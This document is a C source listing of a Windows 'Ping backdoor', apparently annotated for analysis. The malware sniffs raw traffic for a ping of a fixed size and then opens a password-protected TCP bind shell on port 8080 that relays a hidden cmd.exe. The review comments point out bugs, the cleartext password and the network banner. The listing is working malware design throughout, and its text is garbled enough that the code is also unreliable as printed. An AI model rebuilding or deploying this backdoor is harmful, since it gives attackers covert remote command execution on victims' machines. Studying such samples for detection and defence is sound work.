"Ping backdoor" — covert ICMP-triggered Windows bind shell, source code listing. Note: the listing below is case- and spacing-mangled as extracted (e.g. `Int`, `# Include <stdio. h>`) and will not compile as shown; it is reproduced for analysis, not for building.
# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
# Include <ws2tcpip. h>
# Include <mstcpip. h>
# Define ICMP_Echo 8 // ICMP type 8 = echo request; the only type that triggers the shell (see decode_sniffer)
# Define ICMP_ECHOREPLY 0 // ICMP type 0 = echo reply; defined but referenced only in commented-out code
# Define sniffer_icmp_size 101 // expected ICMP payload length: sniffer() only decodes datagrams that are exactly this + 28 (20-byte IP + 8-byte ICMP header) bytes long
# Define bind_port 8080 // TCP port the shell listens on (all interfaces) once triggered
# Define max_packet 10000 // size of the raw-socket receive buffer allocated in sniffer()
# Define def_password "givemeshell! "// cleartext password; bindshell() matches it with strstr(), i.e. any input containing it is accepted
# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s )) // zero-filled process-heap allocation; its NULL result is never checked by the caller
// IPv4 header as delivered on the raw socket. The code relies on this being exactly 20 bytes
// (decode_sniffer() uses BUF + sizeof(ipheader) as the ICMP offset) and never reads the IHL
// nibble, so a packet carrying IP options would be mis-parsed. There is no packing pragma;
// the 20-byte layout depends on default alignment for these member types (TODO confirm per build).
Typedef struct iphdr
{
Unsigned char h_verlen; // version (high nibble) + header length in 32-bit words (low nibble), 1 byte
Unsigned char TOS; // type of service, 1 byte
Unsigned short total_len; // total datagram length in bytes, 2 bytes (not used by this code)
Unsigned short ident; // identification, 2 bytes
Unsigned short frag_and_flags; // flags + fragment offset, 2 bytes
Unsigned char TTL; // time to live, 1 byte
Unsigned char proto; // encapsulated protocol; NOTE: never checked, so the trigger is not restricted to ICMP
Unsigned short checksum; // header checksum, 2 bytes (never verified)
Unsigned int sourceip; // source address, 4 bytes
Unsigned int destip; // destination address, 4 bytes
} Ipheader; // 20 bytes total
// ICMP header, assumed to start at BUF + 20 immediately after the fixed-size IP header. 8 bytes.
// (The tag `_ihdr` is a reserved identifier in C; harmless here but worth renaming.)
Typedef struct _ ihdr
{
Unsigned char I _type; // message type; 8 (ICMP_Echo) is the trigger value compared in decode_sniffer()
Unsigned char I _code; // code, 1 byte (unused)
Unsigned short I _cksum; // checksum, 2 bytes (never verified, so spoofed/garbage packets pass)
Unsigned short I _id; // identifier, 2 bytes (unused)
Unsigned short I _seq; // sequence number, 2 bytes (only printed in the disabled debug dump)
} Icmpheader; // 8 bytes total
Int sniffer (); // raw-socket capture loop; returns -1 on a socket/lookup error, otherwise never returns
Void decode_sniffer (char *, Int, struct sockaddr_in *); // inspects one captured datagram; starts the shell on an ICMP echo request
Int bindshell (); // one-shot TCP bind shell on bind_port, called synchronously from decode_sniffer()
DWORD dwbufferlen [10]; // output buffer handed to WSAIoctl(SIO_RCVALL); its contents are never read
DWORD dwbufferinlen = 1; // SIO_RCVALL input value (1 = enable receive-all mode on the bound interface)
DWORD dwbytesreturned = 0; // bytes returned by WSAIoctl; never checked
Handle bindthread; // unused: the CreateThread call that would set it is commented out in decode_sniffer()
// Entry point. Initialises Winsock 2.2 and hands control to sniffer(), whose capture loop is
// infinite; sniffer() only returns (-1) on a socket or lookup error, so WSACleanup() runs solely
// on that error path. argc/argv are ignored: no options, no detaching from the console, and no
// privilege check (NOTE(review): a raw socket with SIO_RCVALL generally needs administrative
// rights on Windows — the code does not verify this and would just fail inside sniffer()).
Int main (INT argc, char ** argv)
{
Wsadata; // (declared type lost in this listing; presumably WSADATA wsadata)
Int retval;
// Winsock initialisation; the only error that is reported before exit
If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d \ n", retval );
Exit (-1 );
}
// Blocks here for the lifetime of the process unless sniffer() hits an error
Sniffer ();
// Reached only after a sniffer() error
Wsacleanup ();
Return 0;
}
// Raw-socket capture loop. Opens a raw IP socket bound to the host's first resolved address,
// switches it to receive-all mode (SIO_RCVALL) and then loops forever on recvfrom(). Only
// datagrams whose total length is exactly sniffer_icmp_size + 28 bytes (20-byte IP header +
// 8-byte ICMP header + 101-byte payload) are handed to decode_sniffer(); all others are dropped
// silently. Returns -1 on socket creation, name lookup or recvfrom() failure; never returns
// otherwise. bind(), WSAIoctl() and the buffer allocation are not error-checked.
Int sniffer ()
{
Int packsize = sniffer_icmp_size; // expected ICMP payload length (101)
Socket socksniffer;
Struct sockaddr_in DEST, from;
Struct hostent * HP;
Int sread;
Int fromlen = sizeof (from );
Unsigned char localname [256];
Char * recvbuf;
// Raw IP socket so each packet arrives with its IP header (decode_sniffer() relies on this)
If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Printf ("wsasocket () failed: % d \ n", wsagetlasterror ());
Return-1;
}
// Resolve the local host name to choose the interface address to bind to (first address only;
// a multi-homed host is sniffed on one interface)
Gethostname (char *) localname, sizeof (localname)-1 );
If (HP = gethostbyname (char *) localname) = NULL)
{
Return-1;
}
Memset (& DEST, 0, sizeof (DEST ));
Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // first address of the local host
DeST. sin_family = af_inet;
DeST. sin_port = htons (8000); // arbitrary: only the address matters for the raw socket
// Bind to that interface address; return value not checked
BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));
// SIO_RCVALL with input 1 (dwbufferinlen) asks the stack to deliver every incoming IP datagram on
// this interface, not just ICMP. Neither the return value nor dwbytesreturned is checked, so a
// failure here (e.g. insufficient privilege) leaves the loop below receiving nothing, without a message.
Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,
Sizeof (dwbufferlen), & dwbytesreturned, null, null );
// max_packet-byte zero-filled receive buffer; NULL is not checked and it is never freed
Recvbuf = (char *) xmalloc (max_packet );
Printf ("sniffer OK! ");
// Capture loop; exits only on a recvfrom() error
While (1)
{
// Blocking read of one raw datagram, IP header included
Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );
// Error path (the comparison operators are garbled in this listing; the intent is an equality test)
If (sread = socket_error | sread <0)
{
If (wsagetlasterror () = wsaetimedout)
{
Continue;
}
Printf ("recvfrom failed: % d \ n", wsagetlasterror ());
Return-1;
}
Else
// If (sread> = 28)
// Length filter — this is the covert trigger: only datagrams of exactly packsize + 28 = 129 bytes
// (a ping carrying a 101-byte payload) are inspected. The IP protocol field is not consulted, so
// any 129-byte IPv4 datagram whose byte at offset 20 happens to be 8 would also reach the trigger.
If (sread = packsize + 28)
{
// Pass the ICMP payload length (sread - 28); decode_sniffer() computes header offsets itself
Decode_sniffer (recvbuf, sread-28, & from );
}
}
Return 1;
}
// Inspects one captured datagram. Buf points at the IP header; bytes is the ICMP payload length
// (sread - 28, i.e. 101); From is the sender address and is unused outside the disabled debug
// dump. If the ICMP type byte at offset 20 is 8 (echo request) the bind shell is started
// *synchronously*, so sniffer()'s capture loop is blocked for the entire shell session and no
// second trigger is seen until bindshell() returns. Offsets are fixed: no IHL check, no IP
// protocol check, and bytes is never validated against the buffer.
Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)
{
Icmpheader * icmphdr;
// ICMP header assumed to begin right after a 20-byte IP header
Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));
// Disabled debug dump: sender, ICMP type, sequence number and the first bytes - 1 payload characters
/*
Printf ("\ r \ n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data
Printf ("icmp_type: % d", icmphdr-> I _type); // check type
Printf ("icmp_seq: % d \ r \ n", icmphdr-> I _seq); // retrieve the serial number
//? Outbound data segment BUF + 28 + I
For (INT I = 0; I <bytes-1; I ++)
{
Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));
}
*/
// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)
// Trigger condition: ICMP type 8 only (accepting echo replies too was considered, see the line above).
// No authentication at this layer — any host that can ping this machine can open the listener.
If (icmphdr-> I _type = ICMP_Echo)
{
// Start the shell inline; the threaded variant below was abandoned, so this does not return until the session ends
Bindshell ();
// DWORD bid;
// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );
}
Else
Printf ("\ r \ n get other packets! ");
Return;
}
// One-shot TCP bind shell. Listens on 0.0.0.0:bind_port, accepts a single client, sends a banner
// and demands def_password (substring match, cleartext), then bridges the socket to a hidden
// cmd.exe through two anonymous pipes until the client sends "EXIT", the connection closes, or
// a pipe operation fails. Returns 1 when the session ends, -1 if accept() or the password check
// fails. Called synchronously from decode_sniffer(): the listener is closed on every exit path
// and re-created by the next trigger packet. The pipe and process handles are never closed and
// the child cmd.exe is never terminated, so each session leaks a cmd.exe process.
Int bindshell (){
Int bport = bind_port;
Socket bindserver, getclient;
Struct sockaddr_in addrserver, addrclient;
Char buff [4096]; // shared I/O buffer; never NUL-terminated before the strstr() below
// Banner sent in clear to every client before authentication — a usable network signature
Char * messages = "\ r \ n ====================== Ping backdoor v0.1 ==== ===============================\ r \ n ========== code by lion.
Welcome to <a href = 'HTTP: // www.cnhonker.net 'target = _ blank> http://www.cnhonker.net </a> ===========\ r \ n ";
Char * getpass = "\ r \ n your password :";
Char * passok = "\ r \ n OK! Please enter :";
Char * nothispass = "\ r \ n sorry, your password not right. \ r \ n ";
Char * exitok = "\ r \ n exit OK! \ R \ n ";
Char * rebootok = "\ r \ n reboot now! \ R \ n ";
// Listening TCP socket; creation result not checked
Bindserver = socket (af_inet, sock_stream, ipproto_tcp );
// Listen on every interface on bind_port (sin_zero is left uninitialised)
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (bport );
Addrserver. sin_addr.s_addr = addr_any;
// 60 s receive timeout on the listening socket (no recv() is ever done on it, so this is inert)
Int timeout = 60000;
Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));
// SO_REUSEADDR so the port can be re-bound immediately on the next trigger
Uint breuser = 1;
Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));
// bind()/listen() results are not checked; a failure only surfaces as a failed accept()
BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (bindserver, 2 );
Printf ("\ r \ n bind port on % d OK.", bport );
// Block until exactly one client connects; the sniffer stays blocked meanwhile
Int ilen = sizeof (addrclient );
Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );
If (getclient! = Invalid_socket)
{
// 60 s receive timeout on the client socket: recv() below returns SOCKET_ERROR on expiry
Int itimeout = 60000;
Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else
Return-1; // NOTE: bindserver is not closed on this path
// Banner and password prompt, both in cleartext
Send (getclient, messages, strlen (messages), 0 );
Send (getclient, getpass, strlen (getpass), 0 );
// Read the password attempt. As printed the call has three arguments and a length of 0 (listing
// garbled?); in any case whatever is received is not NUL-terminated, so the strstr() below scans
// uninitialised stack memory when the reply is short or absent.
Recv (getclient, buff, 0 );
// Substring match: any input that *contains* def_password passes; no length or equality check
If (! (Strstr (buff, def_password )))
{
// Wrong password: tell the client, log locally, tear down both sockets
Send (getclient, nothispass, strlen (nothispass), 0 );
Printf ("\ r \ n password not right! ");
Closesocket (getclient );
Closesocket (bindserver );
Return-1;
}
Send (getclient, passok, strlen (passok), 0 );
// Two anonymous pipes: pipe1 carries cmd.exe stdout/stderr back to us, pipe2 carries client input to cmd.exe
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread; // NOTE: unsigned — see the recv() check in the relay loop
Security_attributes SA;
SA. nlength = 12; // hard-coded instead of sizeof(SECURITY_ATTRIBUTES); presumably sized for a 32-bit build only
SA. lpsecuritydescriptor = 0; // default security descriptor
SA. binherithandle = true; // all four pipe handles are inheritable; nothing narrows this before CreateProcess()
Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );
Startupinfo siinfo;
Char character line [] = "cmd.exe "; // program spawned (identifier garbled in this listing; used as `cmdline` below)
Process_information processinformation;
Zeromemory (& siinfo, sizeof (siinfo ));
// Hidden window, standard handles redirected to the pipes
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2; // cmd.exe reads what is written to hwritepipe2
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // cmd.exe output arrives on hreadpipe1
Printf ("\ r \ n pipe create OK! ");
// Spawn cmd.exe in this process's own security context (no impersonation). The argument list is
// truncated in this listing (CreateProcess takes ten). `bread` is never checked, so a failed spawn
// still enters the relay loop, which then just waits on an empty pipe and the client socket.
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );
// Relay loop: forward pending cmd.exe output; when there is none, wait for client input
While (1)
{
// Non-blocking peek of up to 1024 bytes of cmd.exe output; lbytesread = bytes peeked
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );
If (lbytesread)
{
// Drain exactly the peeked amount and forward it to the client
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;
Ret = Send (getclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// Blocking recv() bounded by the 60 s SO_RCVTIMEO. On timeout or error recv() returns
// SOCKET_ERROR (-1); stored into an *unsigned* long that becomes 0xFFFFFFFF, so "<= 0" is false
// and the value is passed to WriteFile() as a length — a read far beyond buff[4096]. Only a
// clean close (0 bytes) actually exits here.
Lbytesread = Recv (getclient, buff, 1024,0 );
If (lbytesread <= 0) break;
// Forward client input verbatim to cmd.exe's stdin (this happens before the EXIT/REBOOT tests,
// so cmd.exe also receives those command words)
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );
// Session end: at least 5 bytes starting with "EXIT" (case as printed; the listing may have altered it)
If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')
{
Send (getclient, exitok, strlen (exitok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Return 1; // cmd.exe and all pipe/process handles are left open
}
// Reboot command. As printed the condition tests buff[1] and buff[2] twice with conflicting
// values ('E' vs 'O', 'B' vs 'T'), so it can never be true and this branch is dead code; the
// intended indices were presumably [4] and [5]. Even if reached, ExitWindowsEx(EWX_REBOOT)
// needs the shutdown privilege, which is never enabled here.
Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&
Buff [1] = 'O' & buff [2] = 'T ')
{
Send (getclient, rebootok, strlen (rebootok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Exitwindowsex (ewx_reboot, null );
Return 1;
}
If (! RET) break; // WriteFile() failure, checked only after the command-word tests
}
}
// Pipe failure or connection loss: close the sockets only; cmd.exe keeps running
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}